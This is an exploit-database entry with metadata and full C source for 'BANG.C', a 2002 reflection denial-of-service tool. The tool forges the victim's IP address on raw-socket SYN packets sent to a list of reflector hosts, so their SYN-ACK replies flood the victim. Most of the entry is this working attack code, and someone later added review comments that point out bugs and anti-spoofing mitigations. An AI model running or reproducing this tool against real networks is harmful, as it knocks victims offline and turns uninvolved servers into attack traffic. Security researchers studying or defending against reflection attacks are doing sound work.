vendor:
by:
Sorcerer of DALnet
7.5
CVSS
HIGH
DoS
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

REDIRECTION DOS FINALLY DISTRIBUTED !!!!!

This is a POC and demonstrates a new method of DoS. The idea behind it is that the attacker generates connection requests to a list of hosts which have a TCP service running such as http (80), telnet (23) etc. from the ip of the victim host. This will result in all of the hosts that the victim requested connections to sending back packets (usually SYN-ACK's), 2-3 of them (amplification comes here!), causing load on the victim by causing the victim to send RST packets since it never actually requested any such connection. This attack is dangerous since it's almost impossible to filter!!

Mitigation:

Unknown
Source

Exploit-DB raw data:

/* 
 * BANG.C Coded by Sorcerer of DALnet
 *
 * FUCKZ to: etech, blazin, udp, hybrid and kdl
 * PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
 *             -------------------------------- 
 * REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
 *
 * This is POC and demonstrates a new method of DoS. The idea
 * behind it is that the attacker generates connection requests
 * to a list of hosts which have a TCP service running such as
 * http (80), telnet (23) etc. from the ip of the victim host.
 * This will result in all of the hosts that the victim *requested*
 * connections to sending back packets (usually SYN-ACK's), 2-3 of
 * them (amplification comes here!), causing load on the victim
 * by causing the victim to send RST packets since it never actually
 * requested any such connection. This attack is dangerous since
 * it's almost impossible to filter!!
 *
 * hosts file should be in the format of 1 ip:port per line
 * i.e. 194.66.25.97:80
 *      130.88.172.194:23
 *      65.161.42.42:6667
 * NOTE: target should only be an ip, and all the hosts on the list should
 * also be ips; that's for speed issues.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define __FAVOR_BSD

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>


/* Forward declarations; the definitions follow main() below. */
unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);
/* Raw IPv4 socket (protocol 6 = TCP, IP_HDRINCL) opened in main() and
 * written to by send_syn(). */
int sox;

/* TCP pseudo-header that is prefixed to a copy of the TCP header when
 * send_syn() computes th_sum (see struct checksum).
 * NOTE(review): srca/dsta are declared `unsigned long`, whose width is
 * platform-dependent; the layout presumes a 32-bit address field — confirm
 * on the build target. */
struct pseudo {
  unsigned long srca, dsta;    /* source / destination IPv4 address, network byte order */
  unsigned char zero, proto;   /* zero pad and protocol number (send_syn stores 6 = TCP) */
  unsigned short tcplen;       /* TCP segment length, network byte order */
};

/* Buffer that in_cksum() is run over to produce th_sum: the pseudo-header
 * immediately followed by a copy of the TCP header (filled in by send_syn).
 * Any padding the compiler inserts between the two members is included in
 * the checksummed bytes. */
struct checksum {
  struct pseudo pp;   /* pseudo-header, see send_syn */
  struct tcphdr tt;   /* copy of the TCP header taken with th_sum == 0 */
};

/* Taken out since only works on x86 and rdtsc is also only pentium specific */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len) {
  unsigned short old_sum = p->tcpsum;
  unsigned long s = (unsigned long)&p->sport;
  unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) +
		       (p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
  
  p->tcpsum=0;
  __asm__ __volatile__ (
			/*"xorl %%eax,%%eax;"
			  "cmpl $2,%%ecx;"
			  "jb 1f;"
			  "0:;"
			  "lodsw;"
			  "addw %%ax,%%dx;"
			  "jnc 9f;"
			  "addl $65536,%%edx;"
			  "9:;"
			  "decl %%ecx;"
			  "loop 0b;"
			  "1:;"
			  "orb %%cl,%%cl;"
			  "jz 2f;"
			  "xorw %%ax,%%ax;"
			  "lodsb;"
			  "addw %%ax,%%dx;"
			  "jnz 2f;"
			  "addl $65536,%%edx;"
			  "2:;"
			  "movw %%dx,%%ax;"
			  "shrl $16,%%edx;"
			  "addw %%ax,%%dx;"
			  "adcl $0xffff0000,%%edx;"
			  "xorw $65535,%%dx;"*/
			
			"movw %%dx,%%ax;"
			"shrl $16,%%edx;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			
			"testl $1,%%ecx;"
			"jz 0f;"
			"xorw %%ax,%%ax;"
			"lodsb;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"0:;"
			"shrl $1,%%ecx;"
			"1:;"
			"lodsw;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"loop 1b;"
			"andl $65535,%%edx;"
			"xorw $65535,%%dx;"
			
			:"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
  p->tcpsum=old_sum;
  return(sum);
}

unsigned long long int
rdtsc(void) {
  unsigned long long int tsc;
  unsigned long int tsc_l,tsc_h;
  __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
  tsc=tsc_h;
  tsc=(tsc<<32)|tsc_l;
  return(tsc);
}
#endif

/*
 * Entry point.  Usage: <victim> <host-file> <loop host-file>
 *   argv[1]  victim IPv4 address (dotted quad), used as the forged source
 *   argv[2]  file of "ip:port" lines, one reflector per line
 *   argv[3]  number of passes to make over the host list
 * Loads the host list into ip[]/port[], then calls send_syn() once per
 * host per pass and prints rough timing.  Returns 0 on completion and
 * -1 on usage or setup errors.
 *
 * NOTE(review): everything here hinges on the sender being able to emit
 * packets whose IP source address is not its own; networks that validate
 * source addresses on egress (anti-spoofing filtering) stop the traffic
 * at the first hop, and at the victim the pattern described in the header
 * (SYN-ACKs arriving for connections it never opened, answered by RSTs)
 * should be visible to flow monitoring.
 */
int
main(int argc, char **argv)
{
  int                 enable=1,tmp,tmp2, loop, count=0;
  char               *lala, *tmp1, buf[25];
  /* One-million-entry tables on the stack (several MB).  `count` is the
   * number of entries actually filled from the host file. */
  unsigned long int   ip[1000000], src;
  unsigned short int  port[1000000];
  FILE               *fp;
  struct timeval      start, end;

  printf("\nCoded by Sorcerer of DALnet\n\n");
  
  if(argc != 4){
    fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv);
    fprintf(stderr, "Example:             %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv);
    return(-1);
  }
  
  fp = fopen(argv[2], "r");
  if(fp == NULL){
    fprintf(stderr, "Error while opening: %s\n", argv[2]);
    perror("fopen");
    return(-1);
  }
  
  /* atoi() gives no error indication: non-numeric input reads as 0 and is
   * rejected below, but a negative value is accepted and simply skips the
   * send loop. */
  loop = atoi(argv[3]);
  if(loop == 0){
    fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n");
    return(-1);
  }
  
  /* Pre-fill both tables with htons(23).  NOTE(review): the bound is
   * inclusive, so the last iteration indexes one past the end of each
   * array. */
  for(tmp=0;tmp<=1000000;tmp++){
    ip[tmp] = htons(23);
    port[tmp] = htons(23);
  }

  /* Raw socket for protocol 6 (TCP); opening one typically requires
   * raw-socket privilege on the host. */
  sox = socket(PF_INET, SOCK_RAW, 6);
  if(sox == -1){ perror("socket"); return(-1); }
  
  /* IP_HDRINCL: the IPv4 header built in send_syn() is sent as supplied. */
  tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
  if(tmp == -1){ perror("setsockopt"); return(-1); }

    
  printf("Reading ips on memory and reconstructing in network byte order...\n"); fflush(stdout);
  
  /* Parse "ip:port" lines.  Lines longer than 24 characters are split
   * across fgets() calls; `count` is never compared against the table
   * size, and the strchr() result is not checked for NULL before use. */
  while(1){
    memset(buf, 0, 25);

    tmp1 = fgets(buf, 25, fp);
    if(tmp1 == NULL) break;
    
    if(strlen(buf) < 9) {
      printf("Bogus entry: %s\n", buf);
      continue;
    }
    
    lala = strchr((char *)&buf, ':');

    /* lala now points just past the ':' — the port text. */
    port[count] = htons(atoi(++lala));

    /* Overwrite the ':' with NUL so inet_addr() sees only the address. */
    buf[strlen(buf)-strlen(lala)-1] = '\0';

    ip[count] = inet_addr(buf);

    count++;
    printf("."); fflush(stdout);
  }

  printf("Done.\n");

  /* Forged source address for every packet; inet_addr() failure (INADDR_NONE)
   * is not detected. */
  src = inet_addr(argv[1]);

  tmp = gettimeofday((struct timeval *)&start, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  

  /* send_syn()'s -1 return is ignored; a failed send just moves on. */
  for(tmp2=0;tmp2<loop;tmp2++)
    for(tmp=0;tmp<count;tmp++)
      send_syn(src, ip[tmp], port[tmp]);
  

  tmp = gettimeofday((struct timeval *)&end, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  
  /* NOTE(review): the "time taken" adds tv_sec and tv_usec directly, so the
   * figure is not in any single unit, and "Bytes sent" multiplies the header
   * sizes instead of adding them; the size_t product is also printed with
   * %d.  Both are reporting-only.  fp is never fclose()d. */
  printf("\nTotal time taken: %lu\nBytes sent: %d\n", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
  
  return 0;
}

/*
 * Build one IPv4/TCP SYN in a local buffer and send it on the raw socket
 * `sox`.
 *   src   forged source address (the victim), network byte order
 *   dst   destination address, network byte order
 *   port  destination port, network byte order
 * Returns 0 on success, -1 if sendto() fails (errno reported via perror).
 * Every packet carries the same TOS, TTL and window and a SYN-only flag
 * byte, which makes this traffic fairly uniform on the wire.
 */
short int
send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
  struct sockaddr_in  s;
  struct ip           *i;
  struct tcphdr       *t;
  struct pseudo       p;
  struct checksum     c;
  char                packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
  int                 tmp;

  s.sin_family       = PF_INET;
  s.sin_port         = port;
  s.sin_addr.s_addr  = dst;
 
  /* IP header at the start of the buffer, TCP header right after it.
   * NOTE(review): the offset is computed through an int cast, so this
   * presumes a pointer fits in an int on the build target. */
  i = (struct ip *)&packet;
  t = (struct tcphdr *)((int)i+sizeof(struct ip));

  memset(&packet, 0, sizeof(packet));

  i->ip_hl         = 5;                        /* 20-byte header, no options */
  i->ip_v          = 4;
  i->ip_tos        = 0x08;
  i->ip_len        = htons(sizeof(packet));    /* IP + TCP header only, no payload */
  i->ip_id         = htons(getrandportid());
  i->ip_off        = 0;
  i->ip_ttl        = 255;
  i->ip_p          = 6;                        /* TCP */
  i->ip_sum        = 0;                        /* left zero here; not computed in this file */
  i->ip_src.s_addr = src;                      /* forged: the victim */
  i->ip_dst.s_addr = dst;


  t->th_sport = htons(getrandportid());
  t->th_dport = port;
  /* A 16-bit value widened into the 32-bit field: only half the sequence
   * number varies, the upper half is always zero. */
  t->th_seq   = htons(getrandportid());
  t->th_ack   = 0;
  t->th_x2    = 0;
  t->th_off   = 5;                             /* 20-byte TCP header */
  t->th_flags = 0x02;                          /* SYN only */
  t->th_win   = 65535;                         /* 0xFFFF: byte order is moot */
  t->th_urp   = 0;
  t->th_sum   = 0;                             /* zero while the checksum is computed */

  p.srca      = src;
  p.dsta      = dst;
  p.proto     = 6;
  p.tcplen    = htons(sizeof(struct tcphdr));
  p.zero      = 0;
  
  /* Checksum input = pseudo-header followed by a copy of the TCP header. */
  memcpy(&c.pp, &p, sizeof(p));
  memcpy(&c.tt, t, sizeof(struct tcphdr));

  t->th_sum    = in_cksum((void *)&c, sizeof(c));

  /* Length taken back from the header field; the sockaddr only steers
   * routing since the IP header is supplied by us (IP_HDRINCL). */
  tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
  if(tmp == -1){
    perror("sendto");
    return(-1);
  }

  return 0;
}

/*
 * Return a "random" 16-bit value; send_syn() uses it for the IP id, the
 * TCP source port and the initial sequence number.  The generator is
 * reseeded from the clock on every call, so consecutive calls that land in
 * the same microsecond return the same value, and rand()+1 is truncated to
 * unsigned short.  gettimeofday()'s return value is not checked.
 */
unsigned short int
getrandportid(void)
{
  unsigned short int port;
  struct timeval tv;

  gettimeofday((struct timeval *)&tv, NULL);
  srand(tv.tv_sec+tv.tv_usec);   /* reseed per call: weak, time-derived sequence */

  port = rand()+1;               /* int narrowed to 16 bits */

  return(port);
}


/*
 * One's-complement Internet checksum (RFC 1071 style) over `len` bytes
 * starting at `addr`.  16-bit words are summed as they sit in memory (no
 * byte swapping), so the result is in the same byte order as the input.
 * A trailing odd byte is written into the first byte of a zeroed word and
 * added as that word.  Returns the complemented, carry-folded 16-bit sum.
 */
u_short
in_cksum(u_short *addr, int len)
{
  int sum = 0;                      /* running sum; carries folded at the end */
  const u_short *cursor = addr;
  int remaining = len;
  u_short answer = 0;

  /* Accumulate whole 16-bit words. */
  for (; remaining > 1; remaining -= 2) {
    sum += *cursor++;
  }

  /* Odd trailing byte: pad it to a word and add it in. */
  if (remaining == 1) {
    *(u_char *)(&answer) = *(const u_char *)cursor;
    sum += answer;
  }

  /* Fold the high half back into the low half; a second fold catches the
   * carry the first one can produce. */
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return answer;
}

// milw0rm.com [2002-09-17]